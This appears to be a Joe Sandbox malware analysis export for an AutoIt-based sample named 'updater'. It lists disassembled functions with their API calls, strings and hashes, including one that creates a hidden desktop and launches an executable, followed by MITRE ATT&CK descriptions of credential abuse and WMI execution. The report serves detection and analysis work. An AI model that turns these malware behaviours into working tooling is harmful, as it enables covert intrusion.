Function 00C240B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00C24132

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

Strings

AUTOITCALLVARIABLE%d, xrefs: 00C24124
, $, xrefs: 00C24172

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: cd76c741c13817fa1ea7ca387924cabae6d24cbc51d17ca972f04a5228f22e22
Instruction ID: 03e1e0578ca5f2f91dfe84812f318210c04485c685cd20c88680b2d9e96e117e
Opcode Fuzzy Hash: cd76c741c13817fa1ea7ca387924cabae6d24cbc51d17ca972f04a5228f22e22
Instruction Fuzzy Hash: F9218431A00228ABCF14EF64DC91EAE77F9EF55340F440498F905A7282DB70E996DBA1

Function 017B5EC1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,017B5F9F), ref: 017B5F47
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,017B5F9F), ref: 017B5F4D

Strings

yyyy, xrefs: 017B5F22

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: d18d8cfb79a0b197ebe12f2b3b79f8db4dbdd0a4f68d32fc120c420520d3f10a
Instruction ID: ff7d0b5b9ec6de0664dbd2689987aa2b3b4975056083992874dbb712125f809b
Opcode Fuzzy Hash: d18d8cfb79a0b197ebe12f2b3b79f8db4dbdd0a4f68d32fc120c420520d3f10a
Instruction Fuzzy Hash: F0213D78604209AFDB01EBA8D9D9BEEF3B8EF18300F5000A5F905D7355EB709E408B65

Function 00C36CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00C36D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C36D91

Strings

Combobox, xrefs: 00C36D53

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: f436d0cd9e7ce08dcb3a8a309e875b79d623f957e7d455651c52b5baf958934b
Instruction ID: 72dc8b2998d58ff425d3c62ae3bd6b1676b27b38d27c11bba36febde2ed329ff
Opcode Fuzzy Hash: f436d0cd9e7ce08dcb3a8a309e875b79d623f957e7d455651c52b5baf958934b
Instruction Fuzzy Hash: C411A771320209BFEF259F54DC81FFB3BAAEB843A4F118129F9299B290D671DD518760

Function 00C3722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00BB2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BB214F
Part of subcall function 00BB2111: GetStockObject.GDI32(00000011), ref: 00BB2163
Part of subcall function 00BB2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BB216D

GetWindowRect.USER32(00000000,?), ref: 00C37296
GetSysColor.USER32(00000012), ref: 00C372B0

Strings

static, xrefs: 00C37273

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: e530f48ed457dcee9cd9d685c887a4a636640d13590342084364bdfb70360750
Instruction ID: f587a33de78922785568e29714328841596159d0c458da57189235a0efa33aa8
Opcode Fuzzy Hash: e530f48ed457dcee9cd9d685c887a4a636640d13590342084364bdfb70360750
Instruction Fuzzy Hash: 85211772A2420AAFDB14DFA8DC45AFA7BE8FB08314F114628FE55D3250D635A8519B50

Function 00C36F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00C36FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00C36FD6

Strings

edit, xrefs: 00C36FAB

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 028befd9dd28ab1adc05e30f344caaeda316a6b99591f40a99878583c8034c44
Instruction ID: 78a03b07d139aa9e51d2180a6de8ab660f951483ff9e31f8bbf544a7e630de8f
Opcode Fuzzy Hash: 028befd9dd28ab1adc05e30f344caaeda316a6b99591f40a99878583c8034c44
Instruction Fuzzy Hash: A7113071510209BBEB109EA4EC44FFB3B69EB09368F108714FA75971E0C775DC509B60

Function 00C13156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C131C9
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00C131E8

Strings

0, xrefs: 00C131BF

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: fdf821dc2b0ec8cf33493b0fd7f90c9951ad73ee0d4dbaab809e873c5887f60b
Instruction ID: 5e4e0816fc8ff842ac3cfe616ee071471aa19c5105732b4ba8e51691881f54a9
Opcode Fuzzy Hash: fdf821dc2b0ec8cf33493b0fd7f90c9951ad73ee0d4dbaab809e873c5887f60b
Instruction Fuzzy Hash: FD110B36900198BBEB20DB98DC45BDD77BCAB07318F244161E825A7290D770EF89EB91

Function 00C228A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C228F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C22921

Strings

<local>, xrefs: 00C228E9

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 460efa3340c470377655782000943362d8fcebfc0f3017343dbb67d9d6375a72
Instruction ID: d702ccf4b7116b248aebf4315a8079648fa1de44f3b82f48204a856950b40eb0
Opcode Fuzzy Hash: 460efa3340c470377655782000943362d8fcebfc0f3017343dbb67d9d6375a72
Instruction Fuzzy Hash: FB11E371501235BAEB248F519C88EFBFB6CFF16350F10422AF51546480E3709990D6E0

Function 017C65DD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

ShellExecuteA.SHELL32(00000000,OPEN,00000000,00000000,00000000), ref: 017C6654

Part of subcall function 017C63B9: CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 017C6483
Part of subcall function 017C63B9: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,017C65B2), ref: 017C64C4

Strings

OPEN, xrefs: 017C664D
.exe, xrefs: 017C6608

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: Create$DesktopExecuteProcessShell
String ID: .exe$OPEN
API String ID: 1246678638-879745837
Opcode ID: 3a9a03c79efb92d21fb581ef017908b4e1579ac952ebcb443216e5eed2aac80a
Instruction ID: 34e5ead96d22789cb49203c09054021685adfc745d15e519644d19448956f5e0
Opcode Fuzzy Hash: 3a9a03c79efb92d21fb581ef017908b4e1579ac952ebcb443216e5eed2aac80a
Instruction Fuzzy Hash: 1A01B5743043087BD310AA799CE6F9EF6EDDB89F10F51447DB906E738ADAB09D004194

Function 00C28475 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00C286E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00C2849D,?,00000000,?,?), ref: 00C286F7

inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C284A0
htons.WSOCK32(00000000,?,00000000), ref: 00C284DD

Strings

255.255.255.255, xrefs: 00C284B8

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ByteCharMultiWidehtonsinet_addr
String ID: 255.255.255.255
API String ID: 2496851823-2422070025
Opcode ID: 214364f27664320739be4faf3d1e22ccf4881ba02dcfb0fa15181456ee54b4be
Instruction ID: e42131d2b738a1f2df3b24981dc09b813127871dbfb96892ca26225407af5563
Opcode Fuzzy Hash: 214364f27664320739be4faf3d1e22ccf4881ba02dcfb0fa15181456ee54b4be
Instruction Fuzzy Hash: 54110835240216ABDB10EF64DC52FAEB364FF00310F10851AFA25976D1DB31A914D795

Function 00C099BD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

Part of subcall function 00C0B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C0B7BD

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C09A2B

Strings

ComboBox, xrefs: 00C099CA
ListBox, xrefs: 00C099F5

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 48d530c17dc3ed7451cfc6812d973f00622cb869bf76f66c80923d8707c221a0
Instruction ID: 55d877c4fb8f394dc2cd57d4968e88e6debf7e227cdaf942d33457d3bcf0d7b7
Opcode Fuzzy Hash: 48d530c17dc3ed7451cfc6812d973f00622cb869bf76f66c80923d8707c221a0
Instruction Fuzzy Hash: F201D871A42124ABCB14EBA8CC51EFE73A9FF56360B100A59F876672D2DF315D08D660

Function 00C1934C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C19367
__fread_nolock.LIBCMT ref: 00C1937C

Strings

EA06, xrefs: 00C193AE

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: f50326980ad77acb457fa62ad944f7a1f70e40951583715d42b30882f7a396e1
Instruction ID: 4b1c791470878bc84a21ccd2e2aa69ab247c18d44faef3032142ca66077589dd
Opcode Fuzzy Hash: f50326980ad77acb457fa62ad944f7a1f70e40951583715d42b30882f7a396e1
Instruction Fuzzy Hash: A301B9729042587EDB28C6A8C856EFEBBF8DB15301F00469FF552D2281E575E6149760

Function 00C098B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

Part of subcall function 00C0B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C0B7BD

SendMessageW.USER32(?,00000180,00000000,?), ref: 00C09923

Strings

ComboBox, xrefs: 00C098C2
ListBox, xrefs: 00C098ED

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 4df2e41ea62b32087a3915644e09dcb2461e682c157969e04c354896b72c2410
Instruction ID: 072ea10a6913205cb9adf839146203fe383507b9e7a2e3c406153b880ece7cc8
Opcode Fuzzy Hash: 4df2e41ea62b32087a3915644e09dcb2461e682c157969e04c354896b72c2410
Instruction Fuzzy Hash: 4E01A776A421046BCB14EBA4C952FFF73E8DF16340F14015DB856772D2DA209F08D6B1

Function 00C0993A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BC1A36: _memmove.LIBCMT ref: 00BC1A77

Part of subcall function 00C0B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C0B7BD

SendMessageW.USER32(?,00000182,?,00000000), ref: 00C099A6

Strings

ComboBox, xrefs: 00C09947
ListBox, xrefs: 00C09972

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: fdd316b87801dec64be71b917989f7bbe1216516bc68c43ce5cc026110a0bffd
Instruction ID: 228f79720b966b37cfb065024f344d8f5da57d3e06b0e10f821df1b6757bee69
Opcode Fuzzy Hash: fdd316b87801dec64be71b917989f7bbe1216516bc68c43ce5cc026110a0bffd
Instruction Fuzzy Hash: 3501A772A4210466CB10EBA8CA52FFF73ACDF12340F100059B856732D2DA259F08D671

Function 00C154E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00C15501
_wcscmp.LIBCMT ref: 00C15513

Strings

#32770, xrefs: 00C1550D

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: cfb436a6787a1efbebe1b0a76aec08f14efa70f6e87c119081323f1975da2b77
Instruction ID: 014f0fccc5b981b2dd13c915a6d6e5d7cbaa2c62d480699aff62c8c2afcbb1fb
Opcode Fuzzy Hash: cfb436a6787a1efbebe1b0a76aec08f14efa70f6e87c119081323f1975da2b77
Instruction Fuzzy Hash: D9E0617250022867D3209659AC49F9BF7ECEB45B70F000067FD04D3051E9709E4487E1

Function 00C08892 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00C088A0

Part of subcall function 00BD3588: _doexit.LIBCMT ref: 00BD3592

Strings

Error allocating memory., xrefs: 00C08899
AutoIt, xrefs: 00C08894

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 2a13a5adf0be28197cf5730040b1647f92460947724c87648547e5854d26488a
Instruction ID: 00caca2664c9991954390d70af31278cb249da1c3a2b2a4d4bf240fbc2b17df0
Opcode Fuzzy Hash: 2a13a5adf0be28197cf5730040b1647f92460947724c87648547e5854d26488a
Instruction Fuzzy Hash: 3ED0123128536832D22432A86C1BFDA6EC88B15B51F1044BABB08651C359E59A908195

Function 00BEB4F1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00BEB544: _memset.LIBCMT ref: 00BEB551

Part of subcall function 00BD0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00BEB520,?,?,?,00BB100A), ref: 00BD0B79

IsDebuggerPresent.KERNEL32(?,?,?,00BB100A), ref: 00BEB524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00BB100A), ref: 00BEB533

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00BEB52E

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 17bfa232d577537072233fcb2a424dcc553e4cd851828f8cc3cf54ba0719f653
Instruction ID: f385c2581ef038dee7a6e7922782733afbb6cfc4f032639c7ff2b64306dd641d
Opcode Fuzzy Hash: 17bfa232d577537072233fcb2a424dcc553e4cd851828f8cc3cf54ba0719f653
Instruction Fuzzy Hash: 12E0EDB42103818FC320AF26E815B17BAF0AF10305F10899EE846C2341EBB0D488CB91

Function 00BF0251 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00BF0091

Part of subcall function 00C2C6D9: LoadLibraryA.KERNEL32(kernel32.dll,?,00BF027A,?), ref: 00C2C6E7
Part of subcall function 00C2C6D9: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C2C6F9

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00BF0289

Strings

WIN_XPe, xrefs: 00BF00A4

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: df93e3b653e0cbf24f0b76338edf28cd63d0b514c26fca8af7e087a9b46d345f
Instruction ID: 806a9504cb61d156a4f8bd150c8b5199311f40d0084bf10f85142f27e03fd03c
Opcode Fuzzy Hash: df93e3b653e0cbf24f0b76338edf28cd63d0b514c26fca8af7e087a9b46d345f
Instruction Fuzzy Hash: 72F0A57585510DDFCB25EBA0C998BFCBBF8AB48340F2400C5E246A21A1CBB14E88DF21

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

